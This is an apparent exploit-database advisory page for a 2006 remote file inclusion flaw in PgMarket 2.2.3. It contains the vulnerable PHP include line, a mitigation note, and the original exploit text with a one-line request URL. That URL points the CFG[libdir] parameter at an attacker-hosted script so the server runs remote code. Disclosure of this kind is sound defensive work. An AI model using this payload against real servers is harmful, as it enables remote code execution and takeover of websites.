PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

vendor:

PgMarket

by:

xoron

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: PgMarket

Affected Version From: 2.2.3

Affected Version To: 2.2.3

Patch Exists: NO

Related CWE: N/A

CPE: pgmarket

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a URL in the CFG[libdir] parameter that points to a malicious file hosted on a remote server. If the vulnerable server processes the malicious request, the malicious file will be included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in a file inclusion statement.

Source

Exploit-DB raw data:

####################################################
#
#
#           C Y B E R - W A R R i O R   T I M
#
#
####################################################

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

####################################################

Author: xoron

####################################################

Class : Remote

####################################################

cont@ct: x0r0n[at]hotmail[dot]com

####################################################

Code:

include ($CFG["libdir"] . "stdlib.inc.php");

####################################################

Exploit:
http://server/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?

####################################################

Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends

####################################################

# milw0rm.com [2006-08-09]